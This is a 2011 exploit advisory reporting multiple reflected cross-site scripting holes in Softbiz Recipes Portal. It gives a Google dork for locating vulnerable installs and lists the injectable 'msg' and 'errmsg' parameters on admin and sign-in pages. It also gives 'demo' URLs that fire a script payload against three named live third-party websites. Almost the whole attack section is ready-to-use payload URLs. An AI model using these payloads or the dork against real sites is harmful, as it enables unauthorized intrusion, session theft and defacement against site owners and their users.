################################ In The Name Of God Iran ###############
########################################
# Exploit Title:Softbiz Recipes Portal Multiple XSS Vulnerabilities
# Author: Net.Edit0r
# Date : 2011-08-05
# home Page: http://Black-HG.Org ~ http://h4ckcity.Org
# Location : Iran
# Vendor or Software Link: http://www.softbizscripts.com/
# Contact : Black.hat.tm@Gmail.Com & Net.Edit0r@att.net
# Version: N/A
# Category:: webapps
# Google dork: "Powered by SoftbizScripts"
# Tested on: ubuntu 11.04 ~ Linux Back Track 5
####################################################################
# Proof Of Concept [POC]
http://site/[path]/admin/index.php?msg=[XSS]
http://site/[path]/signinform.php?id=0&return_add=/caregivers/index.php&errmsg=[XSS]
http://site/[path]/signinform.php?errmsg=[XSS]
http://site/[path]/msg_confirm_mem.php?errmsg=[XSS]
# Demo [POC]
http://classifieds-market.net/signinform.php?errmsg="><script>alert(0)</script>
http://www.buy-sellcars.com/msg_confirm_mem.php?errmsg="><script>alert(0)</script>
http://www.micaregivers.org/caregivers/admin/index.php?msg="><script>alert(0)</script>
#########################################################################################
#Greetz To:
DarkCoder , Dr.Niloo , Amir-MaGiC , H3x , Cyrus , D3adlY , 3H34N
Spical Th4nks: B3hz4d | Cru3l.b0y | M4Hd1 | Mikili | L0phtiran And All
My Friendz
[ Pentesters.Ir ] , packetstormsecurity.org, 1337day.com ,securityreason.com
##########################################################################################
########################### Persian Gulf 4 Ever ~ I Love Iran And All Iranian People ####